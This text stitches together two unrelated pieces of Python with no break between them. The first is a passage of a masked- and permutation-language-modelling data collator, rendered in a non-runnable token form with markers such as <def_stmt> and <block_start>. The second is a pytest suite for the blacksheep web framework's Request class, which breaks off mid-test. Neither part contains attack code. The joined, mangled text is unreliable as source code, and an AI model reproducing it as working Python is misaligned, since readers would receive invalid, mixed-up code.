sentence order prediction task. - collates batches of tensors, honoring their tokenizer's pad_token - preprocesses batches for both masked language modeling and sentence order prediction """<def_stmt>__init__ self *args **kwargs<block_start>warnings.warn("DataCollatorForSOP is deprecated and will be removed in a future version, you can now use "<concat>"DataCollatorForLanguageModeling instead." FutureWarning )<block_end># Collate input_ids, apply MLM masking, and carry token_type_ids plus sentence_order_label through. <def_stmt>__call__ self examples:List[Dict[str Any]]<arrow>Dict[str Any]<block_start><import_stmt>torch<import_from_stmt>torch.nn.utils.rnn pad_sequence<line_sep>input_ids=[example["input_ids"]<for>example examples]<line_sep>input_ids=_torch_collate_batch(input_ids self.tokenizer)<line_sep>input_ids,labels,attention_mask=self.mask_tokens(input_ids)<line_sep>token_type_ids=[example["token_type_ids"]<for>example examples]<line_sep># size of segment_ids varied because randomness, padding zero to the end as the original implementation token_type_ids=pad_sequence(token_type_ids batch_first=<true> padding_value=self.tokenizer.pad_token_id)<line_sep>sop_label_list=[example["sentence_order_label"]<for>example examples]<line_sep>sentence_order_label=torch.stack(sop_label_list)<line_sep><return>{"input_ids":input_ids "labels":labels "attention_mask":attention_mask "token_type_ids":token_type_ids "sentence_order_label":sentence_order_label }<block_end><def_stmt>mask_tokens self inputs:Any<arrow>Tuple[Any Any Any]<block_start>""" Prepare masked tokens inputs/labels/attention_mask for masked language modeling: 80% MASK, 10% random, 10% original. N-gram not applied yet. """<import_stmt>torch<if_stmt>self.tokenizer.mask_token<is><none><block_start><raise>ValueError("This tokenizer does not have a mask token which is necessary for masked language modeling. 
Remove the --mlm flag if you want to use this tokenizer.")<block_end>labels=inputs.clone()<line_sep># We sample a few tokens in each sequence for masked-LM training (with probability args.mlm_probability defaults to 0.15 in Bert/RoBERTa) probability_matrix=torch.full(labels.shape self.mlm_probability)<line_sep>special_tokens_mask=[self.tokenizer.get_special_tokens_mask(val already_has_special_tokens=<true>)<for>val labels.tolist()]<line_sep>probability_matrix.masked_fill_(torch.tensor(special_tokens_mask dtype=torch.bool) value=0.0)<if_stmt>self.tokenizer._pad_token<is><not><none><block_start>padding_mask=labels.eq(self.tokenizer.pad_token_id)<line_sep>probability_matrix.masked_fill_(padding_mask value=0.0)<block_end>masked_indices=torch.bernoulli(probability_matrix).bool()<line_sep># probability be `1` (masked), however in albert model attention mask `0` means masked, revert the value attention_mask=(~masked_indices).float()<if_stmt>self.tokenizer._pad_token<is><not><none><block_start>attention_padding_mask=labels.eq(self.tokenizer.pad_token_id)<line_sep>attention_mask.masked_fill_(attention_padding_mask value=1.0)<block_end>labels[~masked_indices]=-100# We only compute loss on masked tokens, -100 is default for CE compute # 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK]) indices_replaced=torch.bernoulli(torch.full(labels.shape 0.8)).bool()&masked_indices<line_sep>inputs[indices_replaced]=self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)<line_sep># 10% of the time, we replace masked input tokens with random word indices_random=torch.bernoulli(torch.full(labels.shape 0.5)).bool()&masked_indices&~indices_replaced<line_sep>random_words=torch.randint(len(self.tokenizer) labels.shape dtype=torch.long)<line_sep>inputs[indices_random]=random_words[indices_random]<line_sep># The rest of the time (10% of the time) we keep the masked input tokens unchanged <return>inputs labels 
attention_mask<block_end><block_end>@dataclass<class_stmt>DataCollatorForPermutationLanguageModeling(DataCollatorMixin)<block_start>""" Data collator used for permutation language modeling. - collates batches of tensors, honoring their tokenizer's pad_token - preprocesses batches for permutation language modeling with procedures specific to XLNet """<line_sep>tokenizer:PreTrainedTokenizerBase<line_sep>plm_probability:float=1/6<line_sep>max_span_length:int=5# maximum length of a span of masked tokens return_tensors:str="pt"<line_sep># Per-framework entry points: collate input_ids, then build XLNet permutation masks and targets. <def_stmt>torch_call self examples:List[Union[List[int] Any Dict[str Any]]]<arrow>Dict[str Any]<block_start><if_stmt>isinstance(examples[0] Mapping)<block_start>examples=[e["input_ids"]<for>e examples]<block_end>batch=_torch_collate_batch(examples self.tokenizer)<line_sep>inputs,perm_mask,target_mapping,labels=self.torch_mask_tokens(batch)<line_sep><return>{"input_ids":inputs "perm_mask":perm_mask "target_mapping":target_mapping "labels":labels}<block_end><def_stmt>tf_call self examples:List[Union[List[int] Any Dict[str Any]]]<arrow>Dict[str Any]<block_start><if_stmt>isinstance(examples[0] Mapping)<block_start>examples=[e["input_ids"]<for>e examples]<block_end>batch=_tf_collate_batch(examples self.tokenizer)<line_sep>inputs,perm_mask,target_mapping,labels=self.tf_mask_tokens(batch)<line_sep><return>{"input_ids":inputs "perm_mask":perm_mask "target_mapping":target_mapping "labels":labels}<block_end><def_stmt>numpy_call self examples:List[Union[List[int] Any Dict[str Any]]]<arrow>Dict[str Any]<block_start><if_stmt>isinstance(examples[0] Mapping)<block_start>examples=[e["input_ids"]<for>e examples]<block_end>batch=_numpy_collate_batch(examples self.tokenizer)<line_sep>inputs,perm_mask,target_mapping,labels=self.numpy_mask_tokens(batch)<line_sep><return>{"input_ids":inputs "perm_mask":perm_mask "target_mapping":target_mapping "labels":labels}<block_end><def_stmt>torch_mask_tokens self inputs:Any<arrow>Tuple[Any Any Any Any]<block_start>""" The masked 
tokens to be predicted for a particular sequence are determined by the following algorithm: 0. Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far). 1. Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked) 2. Reserve a context of length `context_length = span_length / plm_probability` to surround span to be masked 3. Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length - span_length]` and mask tokens `start_index:start_index + span_length` 4. Set `cur_len = cur_len + context_length`. If `cur_len < max_len` (i.e. there are tokens remaining in the sequence to be processed), repeat from Step 1. """<import_stmt>torch<if_stmt>self.tokenizer.mask_token<is><none><block_start><raise>ValueError("This tokenizer does not have a mask token which is necessary for permutation language modeling. Please add a mask token if you want to use this tokenizer.")<block_end><if_stmt>inputs.size(1)%2<ne>0<block_start><raise>ValueError("This collator requires that sequence lengths be even to create a leakage-free perm_mask. Please see relevant comments in source code for details.")<block_end>labels=inputs.clone()<line_sep># Creating the mask and target_mapping tensors masked_indices=torch.full(labels.shape 0 dtype=torch.bool)<line_sep>target_mapping=torch.zeros((labels.size(0) labels.size(1) labels.size(1)) dtype=torch.float32)<for_stmt>i range(labels.size(0))# Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far). 
<block_start>cur_len=0<line_sep>max_len=labels.size(1)<while_stmt>cur_len<l>max_len# Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked) <block_start>span_length=torch.randint(1 self.max_span_length+1 (1 )).item()<line_sep># Reserve a context of length `context_length = span_length / plm_probability` to surround the span to be masked context_length=int(span_length/self.plm_probability)<line_sep># Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length - span_length]` and mask tokens `start_index:start_index + span_length` start_index=cur_len+torch.randint(context_length-span_length+1 (1 )).item()<line_sep>masked_indices[i start_index:start_index+span_length]=1<line_sep># Set `cur_len = cur_len + context_length` cur_len<augadd>context_length<block_end># Since we're replacing non-masked tokens with -100 in the labels tensor instead of skipping them altogether, # the i-th predict corresponds to the i-th token. target_mapping[i]=torch.eye(labels.size(1))<block_end>special_tokens_mask=torch.tensor([self.tokenizer.get_special_tokens_mask(val already_has_special_tokens=<true>)<for>val labels.tolist()] dtype=torch.bool )<line_sep>masked_indices.masked_fill_(special_tokens_mask value=0.0)<if_stmt>self.tokenizer._pad_token<is><not><none><block_start>padding_mask=labels.eq(self.tokenizer.pad_token_id)<line_sep>masked_indices.masked_fill_(padding_mask value=0.0)<block_end># Mask indicating non-functional tokens, where functional tokens are [SEP], [CLS], padding, etc. non_func_mask=~(padding_mask|special_tokens_mask)<line_sep>inputs[masked_indices]=self.tokenizer.mask_token_id<line_sep>labels[~masked_indices]=-100# We only compute loss on masked tokens perm_mask=torch.zeros((labels.size(0) labels.size(1) labels.size(1)) dtype=torch.float32)<for_stmt>i range(labels.size(0))# Generate permutation indices i.e. sample a random factorisation order for the sequence. 
This will # determine which tokens a given token can attend to (encoded in `perm_mask`). # Note: Length of token sequence being permuted has to be less than or equal to reused sequence length # (see documentation for `mems`), otherwise information may leak through due to reuse. In this implementation, # we assume that reused length is half of sequence length and permutation length is equal to reused length. # This requires that the sequence length be even. # Create a linear factorisation order <block_start>perm_index=torch.arange(labels.size(1))<line_sep># Split this into two halves, assuming that half the sequence is reused each time perm_index=perm_index.reshape((-1 labels.size(1)<floordiv>2)).transpose(0 1)<line_sep># Permute the two halves such that they do not cross over perm_index=perm_index[torch.randperm(labels.size(1)<floordiv>2)]<line_sep># Flatten this out into the desired permuted factorisation order perm_index=torch.flatten(perm_index.transpose(0 1))<line_sep># Set the permutation indices of non-masked (non-functional) tokens to the # smallest index (-1) so that: # (1) They can be seen by all other positions # (2) They cannot see masked positions, so there won't be information leak perm_index.masked_fill_(~masked_indices[i]&non_func_mask[i] -1)<line_sep># The logic for whether the i-th token can attend on the j-th token based on the factorisation order: # 0 (can attend): If perm_index[i] > perm_index[j] or j is neither masked nor a functional token # 1 (cannot attend): If perm_index[i] <= perm_index[j] and j is either masked or a functional token perm_mask[i]=(perm_index.reshape((labels.size(1) 1))<le>perm_index.reshape((1 labels.size(1))))&masked_indices[i]<block_end><return>inputs.long() perm_mask target_mapping labels.long()<block_end><def_stmt>tf_mask_tokens self inputs:Any<arrow>Tuple[Any Any Any Any]<block_start>""" The masked tokens to be predicted for a particular sequence are determined by the following algorithm: 0. 
Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far). 1. Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked) 2. Reserve a context of length `context_length = span_length / plm_probability` to surround span to be masked 3. Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length - span_length]` and mask tokens `start_index:start_index + span_length` 4. Set `cur_len = cur_len + context_length`. If `cur_len < max_len` (i.e. there are tokens remaining in the sequence to be processed), repeat from Step 1. """<import_from_stmt>random randint<import_stmt>numpy<as>np<import_stmt>tensorflow<as>tf<if_stmt>self.tokenizer.mask_token<is><none><block_start><raise>ValueError("This tokenizer does not have a mask token which is necessary for permutation language modeling. Please add a mask token if you want to use this tokenizer.")<block_end><if_stmt>tf.shape(inputs)[1]%2<ne>0<block_start><raise>ValueError("This collator requires that sequence lengths be even to create a leakage-free perm_mask. Please see relevant comments in source code for details.")<block_end>labels=tf.identity(inputs)<line_sep># Creating the mask and target_mapping tensors masked_indices=np.full(labels.shape.as_list() 0 dtype=np.bool)<line_sep>labels_shape=tf.shape(labels)<line_sep>target_mapping=np.zeros((labels_shape[0] labels_shape[1] labels_shape[1]) dtype=np.float32)<for_stmt>i range(len(labels))# Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far). 
<block_start>cur_len=0<line_sep>max_len=tf.shape(labels)[1]<while_stmt>cur_len<l>max_len# Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked) <block_start>span_length=randint(1 self.max_span_length+1)<line_sep># Reserve a context of length `context_length = span_length / plm_probability` to surround the span to be masked context_length=int(span_length/self.plm_probability)<line_sep># Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length - span_length]` and mask tokens `start_index:start_index + span_length` start_index=cur_len+randint(0 context_length-span_length+1)<line_sep>masked_indices[i start_index:start_index+span_length]=1<line_sep># Set `cur_len = cur_len + context_length` cur_len<augadd>context_length<block_end># Since we're replacing non-masked tokens with -100 in the labels tensor instead of skipping them altogether, # the i-th predict corresponds to the i-th token. target_mapping[i]=np.eye(labels_shape[1])<block_end>masked_indices=tf.cast(tf.convert_to_tensor(masked_indices) dtype=tf.bool)<line_sep>target_mapping=tf.convert_to_tensor(target_mapping)<line_sep>special_tokens_mask=tf.convert_to_tensor([self.tokenizer.get_special_tokens_mask(val already_has_special_tokens=<true>)<for>val labels.numpy().tolist()] )<line_sep>special_tokens_mask=tf.cast(special_tokens_mask dtype=tf.bool)<line_sep>masked_indices=masked_indices&~special_tokens_mask<if_stmt>self.tokenizer._pad_token<is><not><none><block_start>padding_mask=labels<eq>self.tokenizer.pad_token_id<line_sep>masked_indices=masked_indices&~padding_mask<block_end># Mask indicating non-functional tokens, where functional tokens are [SEP], [CLS], padding, etc. 
non_func_mask=~(padding_mask|special_tokens_mask)<line_sep>inputs=tf.where(masked_indices self.tokenizer.mask_token_id inputs)<line_sep>labels=tf.where(masked_indices labels -100)# We only compute loss on masked tokens perm_mask=[]<for_stmt>i range(len(labels))# Generate permutation indices i.e. sample a random factorisation order for the sequence. This will # determine which tokens a given token can attend to (encoded in `perm_mask`). # Note: Length of token sequence being permuted has to be less than or equal to reused sequence length # (see documentation for `mems`), otherwise information may leak through due to reuse. In this implementation, # we assume that reused length is half of sequence length and permutation length is equal to reused length. # This requires that the sequence length be even. # Create a linear factorisation order # tf.range is the equivalent of torch.arange <block_start>perm_index=tf.range(labels_shape[1])<line_sep># Split this into two halves, assuming that half the sequence is reused each time perm_index=tf.transpose(tf.reshape(perm_index (-1 labels_shape[1]<floordiv>2)))<line_sep># Permute the two halves such that they do not cross over perm_index=tf.random.shuffle(perm_index)# Shuffles along the first dimension # Flatten this out into the desired permuted factorisation order perm_index=tf.reshape(tf.transpose(perm_index) (-1 ))<line_sep># Set the permutation indices of non-masked (non-functional) tokens to the # smallest index (-1) so that: # (1) They can be seen by all other positions # (2) They cannot see masked positions, so there won't be information leak perm_index=tf.where(~masked_indices[i]&non_func_mask[i] -1 perm_index)<line_sep># The logic for whether the i-th token can attend on the j-th token based on the factorisation order: # 0 (can attend): If perm_index[i] > perm_index[j] or j is neither masked nor a functional token # 1 (cannot attend): If perm_index[i] <= perm_index[j] and j is either masked or a functional token 
perm_mask.append((tf.reshape(perm_index (labels_shape[1] 1))<le>tf.reshape(perm_index (1 labels_shape[1])))&masked_indices[i])<block_end>perm_mask=tf.stack(perm_mask axis=0)<line_sep><return>tf.cast(inputs tf.int64) tf.cast(perm_mask tf.float32) target_mapping tf.cast(labels tf.int64)<block_end><def_stmt>numpy_mask_tokens self inputs:Any<arrow>Tuple[Any Any Any Any]<block_start>""" The masked tokens to be predicted for a particular sequence are determined by the following algorithm: 0. Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far). 1. Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked) 2. Reserve a context of length `context_length = span_length / plm_probability` to surround span to be masked 3. Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length - span_length]` and mask tokens `start_index:start_index + span_length` 4. Set `cur_len = cur_len + context_length`. If `cur_len < max_len` (i.e. there are tokens remaining in the sequence to be processed), repeat from Step 1. """<import_from_stmt>random randint<import_stmt>numpy<as>np<if_stmt>self.tokenizer.mask_token<is><none><block_start><raise>ValueError("This tokenizer does not have a mask token which is necessary for permutation language modeling. Please add a mask token if you want to use this tokenizer.")<block_end><if_stmt>inputs.shape[1]%2<ne>0<block_start><raise>ValueError("This collator requires that sequence lengths be even to create a leakage-free perm_mask. 
Please see relevant comments in source code for details.")<block_end>labels=np.copy(inputs)<line_sep># Creating the mask and target_mapping tensors masked_indices=np.full(labels.shape 0 dtype=np.bool)<line_sep>target_mapping=np.zeros((labels.shape[0] labels.shape[1] labels.shape[1]) dtype=np.float32)<for_stmt>i range(labels.shape[0])# Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far). <block_start>cur_len=0<line_sep>max_len=labels.shape[1]<while_stmt>cur_len<l>max_len# Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked) <block_start>span_length=randint(1 self.max_span_length+1)<line_sep># Reserve a context of length `context_length = span_length / plm_probability` to surround the span to be masked context_length=int(span_length/self.plm_probability)<line_sep># Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length - span_length]` and mask tokens `start_index:start_index + span_length` start_index=cur_len+randint(0 context_length-span_length+1)<line_sep>masked_indices[i start_index:start_index+span_length]=1<line_sep># Set `cur_len = cur_len + context_length` cur_len<augadd>context_length<block_end># Since we're replacing non-masked tokens with -100 in the labels tensor instead of skipping them altogether, # the i-th predict corresponds to the i-th token. target_mapping[i]=np.eye(labels.shape[1])<block_end>special_tokens_mask=np.array([self.tokenizer.get_special_tokens_mask(val already_has_special_tokens=<true>)<for>val labels.tolist()] dtype=np.bool )<line_sep>masked_indices[special_tokens_mask]=0<if_stmt>self.tokenizer._pad_token<is><not><none><block_start>padding_mask=labels<eq>self.tokenizer.pad_token_id<line_sep>masked_indices[padding_mask]=0.0<block_end># Mask indicating non-functional tokens, where functional tokens are [SEP], [CLS], padding, etc. 
non_func_mask=~(padding_mask|special_tokens_mask)<line_sep>inputs[masked_indices]=self.tokenizer.mask_token_id<line_sep>labels[~masked_indices]=-100# We only compute loss on masked tokens perm_mask=np.zeros((labels.shape[0] labels.shape[1] labels.shape[1]) dtype=np.float32)<for_stmt>i range(labels.shape[0])# Generate permutation indices i.e. sample a random factorisation order for the sequence. This will # determine which tokens a given token can attend to (encoded in `perm_mask`). # Note: Length of token sequence being permuted has to be less than or equal to reused sequence length # (see documentation for `mems`), otherwise information may leak through due to reuse. In this implementation, # we assume that reused length is half of sequence length and permutation length is equal to reused length. # This requires that the sequence length be even. # Create a linear factorisation order <block_start>perm_index=np.arange(labels.shape[1])<line_sep># Split this into two halves, assuming that half the sequence is reused each time perm_index=perm_index.reshape((-1 labels.shape[1]<floordiv>2)).T<line_sep># Permute the two halves such that they do not cross over np.random.shuffle(perm_index)<line_sep># Flatten this out into the desired permuted factorisation order perm_index=perm_index.T.flatten()<line_sep># Set the permutation indices of non-masked (non-functional) tokens to the # smallest index (-1) so that: # (1) They can be seen by all other positions # (2) They cannot see masked positions, so there won't be information leak perm_index[~masked_indices[i]&non_func_mask[i]]=-1<line_sep># The logic for whether the i-th token can attend on the j-th token based on the factorisation order: # 0 (can attend): If perm_index[i] > perm_index[j] or j is neither masked nor a functional token # 1 (cannot attend): If perm_index[i] <= perm_index[j] and j is either masked or a functional token perm_mask[i]=(perm_index.reshape((labels.shape[1] 1))<le>perm_index.reshape((1 
labels.shape[1])))&masked_indices[i]<block_end><return>inputs.astype(np.int64) perm_mask target_mapping labels.astype(np.int64)<block_end><block_end>
"""Tests for blacksheep's ``Request``: request serialization, query and
cookie parsing, JSON body reading, header manipulation, and the
absolute-URL helper functions.

Fix over the original: ``test_request_pyi`` and
``test_can_set_request_client_ip`` contained bare ``==`` comparison
expressions (no-op statements that asserted nothing); they are now real
assertions.
"""
import pytest

from blacksheep import Content, Request, scribe
from blacksheep.contents import FormPart, MultiPartFormData
from blacksheep.exceptions import BadRequestFormat
from blacksheep.messages import get_absolute_url_to_path, get_request_absolute_url
from blacksheep.scribe import write_small_request
from blacksheep.server.asgi import (
    get_request_url,
    get_request_url_from_scope,
    incoming_request,
)
from blacksheep.testing.helpers import get_example_scope
from blacksheep.url import URL


def test_request_supports_dynamic_attributes():
    request = Request("GET", b"/", None)
    foo = object()
    assert (
        hasattr(request, "foo") is False
    ), "This test makes sense if such attribute is not defined"
    request.foo = foo  # type: ignore
    assert request.foo is foo  # type: ignore


@pytest.mark.asyncio
@pytest.mark.parametrize(
    "url,method,headers,content,expected_result",
    [
        (
            b"https://robertoprevato.github.io",
            "GET",
            [],
            None,
            b"GET / HTTP/1.1\r\nhost: robertoprevato.github.io\r\ncontent-length: 0\r\n\r\n",
        ),
        (
            b"https://robertoprevato.github.io",
            "HEAD",
            [],
            None,
            b"HEAD / HTTP/1.1\r\nhost: robertoprevato.github.io\r\ncontent-length: 0\r\n\r\n",
        ),
        (
            b"https://robertoprevato.github.io",
            "POST",
            [],
            None,
            b"POST / HTTP/1.1\r\nhost: robertoprevato.github.io\r\ncontent-length: 0\r\n\r\n",
        ),
        (
            b"https://robertoprevato.github.io/How-I-created-my-own-media-storage-in-Azure/",
            "GET",
            [],
            None,
            b"GET /How-I-created-my-own-media-storage-in-Azure/ HTTP/1.1\r\nhost: robertoprevato.github.io"
            b"\r\ncontent-length: 0\r\n\r\n",
        ),
        (
            b"https://foo.org/a/b/c/?foo=1&ufo=0",
            "GET",
            [],
            None,
            b"GET /a/b/c/?foo=1&ufo=0 HTTP/1.1\r\nhost: foo.org\r\ncontent-length: 0\r\n\r\n",
        ),
    ],
)
async def test_request_writing(url, method, headers, content, expected_result):
    """The scribe must serialize a request to the exact HTTP/1.1 wire bytes."""
    request = Request(method, url, headers).with_content(content)
    data = b""
    async for chunk in scribe.write_request(request):
        data += chunk
    assert data == expected_result


@pytest.mark.parametrize(
    "url,query,parsed_query",
    [
        (b"https://foo.org/a/b/c?hello=world", b"hello=world", {"hello": ["world"]}),
        (
            b"https://foo.org/a/b/c?hello=world&foo=power",
            b"hello=world&foo=power",
            {"hello": ["world"], "foo": ["power"]},
        ),
        (
            b"https://foo.org/a/b/c?hello=world&foo=power&foo=200",
            b"hello=world&foo=power&foo=200",
            {"hello": ["world"], "foo": ["power", "200"]},
        ),
    ],
)
def test_parse_query(url, query, parsed_query):
    request = Request("GET", url, None)
    assert request.url.value == url
    assert request.url.query == query
    # repeated keys accumulate into the same list
    assert request.query == parsed_query


@pytest.mark.asyncio
async def test_can_read_json_data_even_without_content_type_header():
    request = Request("POST", b"/", None)
    request.with_content(Content(b"application/json", b'{"hello":"world","foo":false}'))
    data = await request.json()
    assert data == {"hello": "world", "foo": False}


@pytest.mark.asyncio
async def test_if_read_json_fails_content_type_header_is_checked_json_gives_bad_request_format():
    request = Request("POST", b"/", [(b"Content-Type", b"application/json")])
    request.with_content(Content(b"application/json", b'{"hello":'))  # broken json
    with pytest.raises(BadRequestFormat):
        await request.json()


@pytest.mark.asyncio
async def test_if_read_json_fails_content_type_header_is_checked_non_json_gives_invalid_operation():
    request = Request("POST", b"/", [])
    request.with_content(Content(b"application/json", b'{"hello":'))
    # broken json; broken content-type
    with pytest.raises(BadRequestFormat):
        await request.json()


def test_cookie_parsing():
    request = Request(
        "POST", b"/", [(b"Cookie", b"ai=something; hello=world; foo=Hello%20World%3B;")]
    )
    assert request.cookies == {
        "ai": "something",
        "hello": "world",
        "foo": "Hello World;",
    }


def test_cookie_parsing_multiple_cookie_headers():
    request = Request(
        "POST",
        b"/",
        [
            (b"Cookie", b"ai=something; hello=world; foo=Hello%20World%3B;"),
            (b"Cookie", b"jib=jab; ai=else;"),
        ],
    )
    # a later Cookie header wins for a repeated name
    assert request.cookies == {
        "ai": "else",
        "hello": "world",
        "foo": "Hello World;",
        "jib": "jab",
    }


def test_cookie_parsing_duplicated_cookie_header_value():
    request = Request(
        "POST",
        b"/",
        [(b"Cookie", b"ai=something; hello=world; foo=Hello%20World%3B; hello=kitty;")],
    )
    # within a single header the last occurrence of a name wins
    assert request.cookies == {
        "ai": "something",
        "hello": "kitty",
        "foo": "Hello World;",
    }


@pytest.mark.parametrize(
    "header,expected_result",
    [
        [(b"Expect", b"100-Continue"), True],
        [(b"expect", b"100-continue"), True],
        [(b"X-Foo", b"foo"), False],
    ],
)
def test_request_expect_100_continue(header, expected_result):
    """Header name and value matching must be case-insensitive."""
    request = Request("POST", b"/", [header])
    assert expected_result == request.expect_100_continue()


@pytest.mark.parametrize(
    "headers,expected_result",
    [
        [[(b"Content-Type", b"application/json")], True],
        [[(b"Content-Type", b"application/problem+json")], True],
        [[(b"Content-Type", b"application/json; charset=utf-8")], True],
        [[], False],
        [[(b"Content-Type", b"application/xml")], False],
    ],
)
def test_request_declares_json(headers, expected_result):
    request = Request("GET", b"/", headers)
    assert request.declares_json() is expected_result


def test_small_request_headers_add_through_higher_api():
    request = Request("GET", b"https://hello-world", None)
    request.headers.add(b"Hello", b"World")
    raw_bytes = write_small_request(request)
    assert b"Hello: World\r\n" in raw_bytes


def test_small_request_headers_add_through_higher_api_many():
    request = Request("GET", b"https://hello-world", None)
    request.headers.add_many({b"Hello": b"World", b"X-Foo": b"Foo"})
    raw_bytes = write_small_request(request)
    assert b"Hello: World\r\n" in raw_bytes
    assert b"X-Foo: Foo\r\n" in raw_bytes


def test_small_request_headers_add_through_lower_api():
    request = Request("GET", b"https://hello-world", None)
    request.add_header(b"Hello", b"World")
    raw_bytes = write_small_request(request)
    assert b"Hello: World\r\n" in raw_bytes


@pytest.mark.parametrize(
    "initial_url,new_url",
    [
        (b"https://hello-world/", b"https://ciao-mondo/"),
        (b"https://hello-world/one/two/three", b"https://hello-world/one/two/three/"),
        (b"https://hello-world/one/two/three/", b"https://hello-world/one/two/three"),
    ],
)
def test_request_can_update_url(initial_url, new_url):
    request = Request("GET", initial_url, None)
    assert request.url.value == initial_url
    request.url = URL(new_url)
    assert request.url.value == new_url


def test_request_content_type_is_read_from_content():
    request = Request("POST", b"/", []).with_content(
        MultiPartFormData([FormPart(b"a", b"world"), FormPart(b"b", b"9000")])
    )
    assert request.content is not None
    assert request.content_type() == request.content.type


@pytest.mark.parametrize(
    "scope,expected_value",
    [
        (
            get_example_scope("GET", "/foo", scheme="http", server=["127.0.0.1", 8000]),
            "http://127.0.0.1:8000/foo",
        ),
        (
            get_example_scope("GET", "/foo", scheme="http", server=["127.0.0.1", 80]),
            "http://127.0.0.1/foo",
        ),
        (
            get_example_scope(
                "GET", "/foo", scheme="https", server=["127.0.0.1", 44777]
            ),
            "https://127.0.0.1:44777/foo",
        ),
        (
            get_example_scope("GET", "/foo", scheme="https", server=["127.0.0.1", 443]),
            "https://127.0.0.1/foo",
        ),
    ],
)
def test_get_asgi_request_full_url(scope, expected_value):
    """Default ports (80/443) must be omitted from the reconstructed URL."""
    request = incoming_request(scope, None)
    full_url = get_request_url(request)
    assert full_url == expected_value


def test_request_pyi():
    request = Request("GET", b"/", [(b"cookie", b"foo=aaa")])
    # FIX: these were bare `==` expressions in the original and asserted nothing
    assert request.cookies["foo"] == "aaa"
    assert request.get_cookie("foo") == "aaa"
    assert request.get_first_header(b"cookie") == b"foo=aaa"
    request.set_cookie("lorem", "ipsum")
    assert request.get_cookie("lorem") == "ipsum"


@pytest.mark.parametrize(
    "scope,trailing_slash,expected_value",
    [
        [
            {"scheme": "https", "path": "/", "server": ("www.neoteroi.dev", 443)},
            False,
            "https://www.neoteroi.dev/",
        ],
        [
            {"scheme": "https", "path": "/admin", "server": ("www.neoteroi.dev", 443)},
            False,
            "https://www.neoteroi.dev/admin",
        ],
        [
            {"scheme": "https", "path": "/admin", "server": ("www.neoteroi.dev", 443)},
            True,
            "https://www.neoteroi.dev/admin/",
        ],
        [
            {
                "scheme": "https",
                "path": "/admin",
                "server": ("www.neoteroi.dev", 44777),
            },
            True,
            "https://www.neoteroi.dev:44777/admin/",
        ],
        [
            {"scheme": "http", "path": "/admin", "server": ("www.neoteroi.dev", 44777)},
            True,
            "http://www.neoteroi.dev:44777/admin/",
        ],
        [
            {"scheme": "http", "path": "/admin", "server": ("www.neoteroi.dev", 80)},
            True,
            "http://www.neoteroi.dev/admin/",
        ],
        [
            {
                "scheme": "http",
                "path": "/admin",
                "server": ("www.neoteroi.dev", 80),
                "query_string": b"foo=Hello%20World%20%C3%B8",
            },
            False,
            "http://www.neoteroi.dev/admin?foo=Hello%20World%20%C3%B8",
        ],
    ],
)
def test_get_request_url_from_scope(scope, trailing_slash, expected_value):
    result = get_request_url_from_scope(scope, trailing_slash=trailing_slash)
    assert result == expected_value


def test_get_request_url_from_scope_raises_for_invalid_scope():
    with pytest.raises(ValueError):
        get_request_url_from_scope({})


@pytest.mark.parametrize(
    "scope,expected_value",
    [
        (
            get_example_scope("GET", "/foo", scheme="http", server=["127.0.0.1", 8000]),
            "http://127.0.0.1:8000/foo",
        ),
        (
            get_example_scope("GET", "/foo", scheme="http", server=["127.0.0.1", 80]),
            "http://127.0.0.1/foo",
        ),
        (
            get_example_scope(
                "GET", "/foo", scheme="https", server=["127.0.0.1", 44777]
            ),
            "https://127.0.0.1:44777/foo",
        ),
        (
            get_example_scope("GET", "/foo", scheme="https", server=["127.0.0.1", 443]),
            "https://127.0.0.1/foo",
        ),
    ],
)
def test_get_request_absolute_url(scope, expected_value):
    request = incoming_request(scope)
    assert request.scheme == scope["scheme"]
    assert request.host == dict(scope["headers"])[b"host"].decode()
    assert request.base_path == ""
    absolute_url = get_request_absolute_url(request)
    assert str(absolute_url) == f"{request.scheme}://{request.host}{request.path}"
    assert str(absolute_url) == expected_value


@pytest.mark.parametrize(
    "scope,base_path,expected_value",
    [
        (
            get_example_scope("GET", "/foo", scheme="http", server=["127.0.0.1", 8000]),
            "/api",
            "http://127.0.0.1:8000/api/foo",
        ),
        (
            get_example_scope("GET", "/foo", scheme="http", server=["127.0.0.1", 80]),
            "/api/",
            "http://127.0.0.1/api/foo",
        ),
        (
            get_example_scope(
                "GET", "/foo", scheme="https", server=["127.0.0.1", 44777]
            ),
            "/api/oof",
            "https://127.0.0.1:44777/api/oof/foo",
        ),
        (
            get_example_scope("GET", "/foo", scheme="https", server=["127.0.0.1", 443]),
            "/api/oof/",
            "https://127.0.0.1/api/oof/foo",
        ),
    ],
)
def test_get_request_absolute_url_with_base_path(scope, base_path, expected_value):
    """A configured base_path must be prefixed (trailing slash normalized)."""
    request = incoming_request(scope)
    assert request.scheme == scope["scheme"]
    assert request.host == dict(scope["headers"])[b"host"].decode()
    request.base_path = base_path
    absolute_url = get_request_absolute_url(request)
    assert str(absolute_url) == expected_value


@pytest.mark.parametrize(
    "scope,path,expected_result",
    [
        (
            get_example_scope("GET", "/foo", scheme="http", server=["127.0.0.1", 8000]),
            "/sign-in",
            "http://127.0.0.1:8000/sign-in",
        ),
        (
            get_example_scope("GET", "/", scheme="http", server=["127.0.0.1", 8000]),
            "/authorization/callback",
            "http://127.0.0.1:8000/authorization/callback",
        ),
        (
            get_example_scope(
                "GET", "/a/b/c/", scheme="http", server=["127.0.0.1", 8000]
            ),
            "/authorization/callback",
            "http://127.0.0.1:8000/authorization/callback",
